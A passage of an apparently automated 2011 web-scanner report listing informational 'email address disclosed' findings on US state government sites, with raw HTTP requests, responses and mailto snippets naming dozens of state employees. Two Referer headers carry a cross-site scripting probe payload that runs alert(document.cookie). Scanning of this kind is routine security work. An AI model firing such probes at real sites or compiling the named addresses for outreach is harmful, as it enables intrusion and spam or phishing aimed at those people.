Date: Sat, 30 Apr 2011 00:43:33 GMT
Server: Microsoft-IIS/6.0
Content-Length: 9712
Content-Type: text/html; charset=ISO-8859-1
Content-Location: http://www.doc.state.nc.us/clemency/index.htm
Last-Modified: Thu, 17 Feb 2011 20:36:48 GMT
Accept-Ranges: bytes
ETag: "41bda166e2cecb1:2908"
MicrosoftOfficeWebServer: 5.0_Pub

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsof
...[SNIP]...
<a href="mailto:clemency@nc.gov">clemency@nc.gov</a>
...[SNIP]...

22.146. http://www.dol.wa.gov/driverslicense/guide.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dol.wa.gov
Path:   /driverslicense/guide.html

Issue detail

The following email address was disclosed in the response:

Request

GET /driverslicense/guide.html HTTP/1.1
Host: www.dol.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304162136269_813518","to":3,"c":"http://access.wa.gov/","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1304162690430}; __utmz=184417587.1304162697.1.1.utmcsr=access.wa.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=184417587.1815769971.1304162697.1304162697.1304162697.1; __utmc=184417587; __utmb=184417587.1.10.1304162697;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:54 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Mon, 04 Apr 2011 14:38:18 GMT
ETag: "20120-60fc-4a018b5e22a80"
Accept-Ranges: bytes
Content-Length: 24828
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:drivers@dol.wa.gov">drivers@dol.wa.gov</a>
...[SNIP]...

22.147. http://www.doleta.gov/disability/new_dpn_grants.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doleta.gov
Path:   /disability/new_dpn_grants.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /disability/new_dpn_grants.cfm HTTP/1.1
Host: www.doleta.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 09:19:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<m
...[SNIP]...
<a href="mailto:Tammy.Farmer@adeca.alabama.gov">Tammy.Farmer@adeca.alabama.gov</a>
...[SNIP]...
<a href="mailto:nicole.skeek@alaska.gov">nicole.skeek@alaska.gov</a>
...[SNIP]...
<a href="mailto:mwilliams@azdes.gov">mwilliams@azdes.gov
</a>
...[SNIP]...
<a href="mailto:glenn.sergeant@arkansas.gov">glenn.sergeant@arkansas.gov</a>
...[SNIP]...
<a href="mailto:desi.malone@edd.ca.gov">
desi.malone@edd.ca.gov</a>
...[SNIP]...
<a href="mailto:Lee.carter@state.co.us">Lee.carter@state.co.us
</a>
...[SNIP]...
<a href="mailto:suzanne.liquerman@ct.gov">suzanne.liquerman@ct.gov</a>
...[SNIP]...
<a href="mailto:miranda.marquez@state.de.us">miranda.marquez@state.de.us</a>
...[SNIP]...
<a href="mailto:ruby.washington@dc.gov">
ruby.washington@dc.gov</a>
...[SNIP]...
<a href="mailto:diane.vacca@flaawi.com">diane.vacca@flaawi.com</a>
...[SNIP]...
<a href="mailto:brenda.young@dol.state.ga.us">brenda.young@dol.state.ga.us</a>
...[SNIP]...
<a href="mailto:phyllis.topasna@dol.guam.gov">phyllis.topasna@dol.guam.gov</a>
...[SNIP]...
<a href="mailto:eyoung@dlir.state.hi.us">
eyoung@dlir.state.hi.us</a>
...[SNIP]...
<a href="mailto:gordon.graff@labor.idaho.gov">gordon.graff@labor.idaho.gov</a>
...[SNIP]...
<a href="mailto:william.sinwell@illinois.gov">william.sinwell@illinois.gov</a>
...[SNIP]...
<a href="mailto:bbdougherty@dwd.in.gov">bbdougherty@dwd.in.gov</a>
...[SNIP]...
<a href="mailto:Douglas.keast@iwd.iowa.gov">Douglas.keast@iwd.iowa.gov</a>
...[SNIP]...
<a href="mailto:sweidenbach@kansascommerce.com">sweidenbach@kansascommerce.com</a>
...[SNIP]...
<a href="mailto:dhoward@lwc.la.gov">dhoward@lwc.la.gov</a>
...[SNIP]...
<a href="mailto:Libby.Stone-sterling@Maine.gov">Libby.Stone-sterling@Maine.gov</a>
...[SNIP]...
<a href="mailto:mleedy@montgomeryworks.com">mleedy@montgomeryworks.com</a>
...[SNIP]...
<a href="mailto:lmatrundola@detma.org">
lmatrundola@detma.org</a>
...[SNIP]...
<a href="mailto:Childsd@michigan.gov">Childsd@michigan.gov</a>
...[SNIP]...
<a href="mailto:darlene.kratt@state.mn.us">darlene.kratt@state.mn.us</a>
...[SNIP]...
<a href="mailto:Kristin.Funk@ded.mo.gov">
Kristin.Funk@ded.mo.gov</a>
...[SNIP]...
<a href="mailto:pmccubbins@mt.gov">pmccubbins@mt.gov</a>
...[SNIP]...
<a href="mailto:klmorigeau@nvdetr.org">klmorigeau@nvdetr.org
</a>
...[SNIP]...
<a href="mailto:cnaiditch@nhworkforce.org">cnaiditch@nhworkforce.org</a>
...[SNIP]...
<a href="mailto:joseph.gazzara@dol.state.nj.us">joseph.gazzara@dol.state.nj.us</a>
...[SNIP]...
<a href="mailto:lawrence.maestas@state.nm.us">lawrence.maestas@state.nm.us</a>
...[SNIP]...
<a href="mailto:Elaine.Kost@labor.state.ny.us">Elaine.Kost@labor.state.ny.us</a>
...[SNIP]...
<a href="mailto:bsavage@nccommerce.com">
bsavage@nccommerce.com</a>
...[SNIP]...
<a href="mailto:Gwen.Ivory@jfs.ohio.gov">
Gwen.Ivory@jfs.ohio.gov</a>
...[SNIP]...
<a href="mailto:bingram@worksystems.org">
bingram@worksystems.org</a>
...[SNIP]...
<a href="mailto:jbravo@cdorh.org">jbravo@cdorh.org</a>
...[SNIP]...
<a href="mailto:cfallaw@sces.org">cfallaw@sces.org</a>
...[SNIP]...
<a href="mailto:mike.ryan@state.sd.us">
mike.ryan@state.sd.us</a>
...[SNIP]...
<a href="mailto:hoechsel@workforceessentials.com">hoechsel@workforceessentials.com</a>
...[SNIP]...
<a href="mailto:janice.ferguson@twc.state.tx.us">janice.ferguson@twc.state.tx.us</a>
...[SNIP]...
<a href="mailto:sterry@utah.gov">sterry@utah.gov</a>
...[SNIP]...
<a href="mailto:Jim.Dorsey@state.vt.us">
Jim.Dorsey@state.vt.us</a>
...[SNIP]...
<a href="mailto:wgiron@vidol.gov">
wgiron@vidol.gov</a>
...[SNIP]...
<a href="mailto:ed.turner@governor.virginia.gov">ed.turner@governor.virginia.gov</a>
...[SNIP]...
<a href="mailto:tolson2@esd.wa.gov">tolson2@esd.wa.gov</a>
...[SNIP]...
<a href="mailto:iholland@workforcewv.org">
iholland@workforcewv.org</a>
...[SNIP]...
<a href="mailto:glenn.glenn.olsen@dwd.wisconsin.gov">glenn.olsen@dwd.wisconsin.gov</a>
...[SNIP]...

22.148. http://www.dyve.net/jquery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dyve.net
Path:   /jquery/

Issue detail

The following email address was disclosed in the response:

Request

GET /jquery/ HTTP/1.1
Host: www.dyve.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:59 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 973

<!DOCTYPE html>
<html>
   <head>
       <title>jQuery Plugins by Dylan Verheul</title>
       <link rel="stylesheet" type="text/css" href="main.css" />
       <script type="text/javascript" src="/jquery/js/jquery.js">
...[SNIP]...
<p>Copyright &copy; Dylan Verheul &lt;dylan@dyve.net&gt;</p>
...[SNIP]...

22.149. http://www.epa.ohio.gov/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epa.ohio.gov
Path:   /Default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Host: www.epa.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:32:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=yYjYccQ9zAEkAAAAZDYxNTQwOTctNTYzMS00NjYyLTgwYTctNzcxOGJkNTA0MmI20; expires=Fri, 08-Jul-2011 23:12:01 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:Web.requests@epa.state.oh.us?subject=Web Inquiry&amp;body=Note: If you are reporting a broken link or problem with our Web site, please provide the address of the page you are referring to.">
...[SNIP]...
<a href="mailto:webmanager@epa.state.oh.us?subject=Ohio EPA Web Site Feedback&amp;body=Note: If you are reporting a broken link or problem with our Web site, please provide the address of the page you are referring to.">
...[SNIP]...

22.150. http://www.georgiawildlife.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgiawildlife.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.georgiawildlife.com
Proxy-Connection: keep-alive
Referer: http://www.georgia.gov/external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:01:12 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=q10cgseom8ongqf0n62a1n7e46; expires=Mon, 23 May 2011 04:34:32 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Fri, 29 Apr 2011 20:55:56 GMT
ETag: "e18fa6a0947ebfa84a0ffd4cf9198d18"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...
<a href="mailto:deron_davis@dnr.state.ga.us">
...[SNIP]...

22.151. http://www.governmentjobs.com//js/wddx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governmentjobs.com
Path:   //js/wddx.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET //js/wddx.js HTTP/1.1
Host: www.governmentjobs.com
Proxy-Connection: keep-alive
Referer: http://agency.governmentjobs.com/tennessee/default.cfm?e3bda%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d3b780a45a=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 22462
Content-Type: application/x-javascript
Content-Location: http://www.governmentjobs.com//js/wddx.js
Last-Modified: Sat, 12 Apr 2003 17:31:51 GMT
Accept-Ranges: bytes
ETag: "805dfa66191c31:29e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:25:01 GMT

///////////////////////////////////////////////////////////////////////////
//
//    Filename:        wddx.js
//
//    Authors:        Simeon Simeonov (simeons@allaire.com)
//                    Nate Weiss (nweiss@icesinc.com)
//
//    Last Modified:    February 2, 2001
//
///////////////////////////////////////////////////////////////////////////


/////////////////////////////////////////////////////////////////////////
...[SNIP]...

22.152. http://www.governor.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governor.ny.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.governor.ny.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69751567.1304117377.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69751567.1583628114.1304117377.1304117377.1304117377.1; __utmc=69751567; __utmb=69751567.2.10.1304117377

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:17 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 22:02:42 GMT
ETag: "23d8f4d-94ef-4a215d536e480"
Accept-Ranges: bytes
Content-Length: 38127
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<me
...[SNIP]...
<a href="mailto:Empire.20@cio.ny.gov">
...[SNIP]...

22.153. http://www.governor.ny.gov/js/js_6bd6cece2835e62cf45d64d29e58747f.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governor.ny.gov
Path:   /js/js_6bd6cece2835e62cf45d64d29e58747f.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/js_6bd6cece2835e62cf45d64d29e58747f.js HTTP/1.1
Host: www.governor.ny.gov
Proxy-Connection: keep-alive
Referer: http://www.governor.ny.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69751567.1304117377.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69751567.1583628114.1304117377.1304117377.1304117377.1; __utmc=69751567; __utmb=69751567.2.10.1304117377; webpool=webpool_web01

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:27 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 22:48:57 GMT
ETag: "23d8a5a-34045-4a2167a9e0840"
Accept-Ranges: bytes
Content-Length: 213061
Cache-Control: max-age=1209600
Expires: Fri, 13 May 2011 22:50:27 GMT
Content-Type: text/javascript

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
</em>';
}
};
;// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi
...[SNIP]...

22.154. http://www.healthynh.com/inc/menusNeue.phpi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthynh.com
Path:   /inc/menusNeue.phpi

Issue detail

The following email address was disclosed in the response:

Request

GET /inc/menusNeue.phpi HTTP/1.1
Host: www.healthynh.com
Proxy-Connection: keep-alive
Referer: http://www.healthynh.com/index-fhc.php?b8336%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2bdf6318525=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cc614ca6161e77fea09a1fc0b5f1cc13

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:55 GMT
Server: L1c
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/javascript;charset=iso-8859-1
Content-Length: 9680


/*
Milonic DHTML Website Navigation Menu - Version 3.x
Written by Andy Woolley - Copyright 2002 (c) Milonic Solutions Limited. All Rights Reserved.
Please visit http://www.milonic.co.uk/menu or e-mail menu3@milonic.com for more information.

The Free use of this menu is only available to Non-Profit, Educational & Personal web sites.
Commercial and Corporate licenses are available for use on all other web sites &
...[SNIP]...

22.155. http://www.healthynh.com/index-fhc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthynh.com
Path:   /index-fhc.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index-fhc.php HTTP/1.1
Host: www.healthynh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:13 GMT
Server: L1c
Set-Cookie: PHPSESSID=7d9f638b0a2407643a5cc7de2db0917a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17303

<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
   <title>Foundation for Healthy Communities</title>
   <link rel="stylesheet" href="/inc/default.css.phpi" type="
...[SNIP]...
<a href="mailto:info@healthynh.com">info@healthynh.com</a>
...[SNIP]...

22.156. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/CPACM.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Compass.Web/CPACM.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=EN; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<a href='MailTo:CompassMail@state.pa.us?subject=Compass CPV Acct Mgmt - Organization'>
...[SNIP]...

22.157. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illinois.gov
Path:   /PressReleases/PressReleasesSearch.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /PressReleases/PressReleasesSearch.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:53 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010680;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=22644029;domain=.illinois.gov;path=/
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Search the News</
...[SNIP]...
= " bgcolor='"+gcBG+"' bordercolor='"+gcBG+"' valign='middle' align='center' height='"+iCellHeight+"' style='font:bold "+iDateTextSize+" Courier;"; //Coded by Liming Weng(Victor Won) email:victorwon@netease.com

with (document) {
   write("<tr>
...[SNIP]...
</Div>");
}
// End -- Coded by Liming Weng, email: victorwon@netease.com -->
...[SNIP]...

22.158. http://www.in.gov/dnr/6406.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dnr/6406.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /dnr/6406.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 34152

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 6406 - pub
...[SNIP]...
<A href="mailto:dnrwebmaster@dnr.in.gov">dnrwebmaster@dnr.in.gov</A>
...[SNIP]...

22.159. http://www.in.gov/portal/global/javascript/9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/javascript/9.js

Issue detail

The following email address was disclosed in the response:

Request

GET /portal/global/javascript/9.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:52 GMT
Server: Apache
Last-Modified: Tue, 26 Jan 2010 16:16:45 GMT
ETag: "cac869-3f72-47e139cae7540"
Accept-Ranges: bytes
Content-Length: 16242
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:52 GMT; path=/

...
//Script for Find a Agency page.
/***********************************************
* Advanced Gallery script- .. Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice must stay inta
...[SNIP]...
</strong> (me@myemail.com).</p>
...[SNIP]...

22.160. http://www.inshapeindiana.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inshapeindiana.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.inshapeindiana.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:05 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.24
Last-Modified: Thu, 27 Jan 2011 18:42:24 GMT
ETag: "8fb61-4123-4d41bc90"
Accept-Ranges: bytes
Content-Length: 16675
Connection: close
Content-Type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 3 - published
...[SNIP]...
<a href="mailto:inshapehelp@isdh.in.gov" target="_blank">
...[SNIP]...
<a href="mailto:inshapehelp@isdh.in.gov">inshapehelp@isdh.in.gov</a>
...[SNIP]...

22.161. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:07 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1216050931@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:07 GMT
Server: ecom302
Connection: close
Content-Length: 38122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
t)
               esg.ident = {model:{}};
           if (!esg.ident.model)
               esg.ident.model = new Object();
           esg.ident.model.member = '1216050931';
           
           esg.ident.model.ssId = '';
               
           esg.ident.model.login = 'anon_mem1216050931@kodakgallery.com';
           esg.ident.model.firstName = " ";
           esg.ident.model.isAnon = true;
           esg.ident.model.facebookApplicationId = '130103297018848';
           
                   esg.ident.model.isFBLogin = false;
                       
           if (fals
...[SNIP]...

22.162. http://www.ksde.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ksde.org
Path:   /Default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Host: www.ksde.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
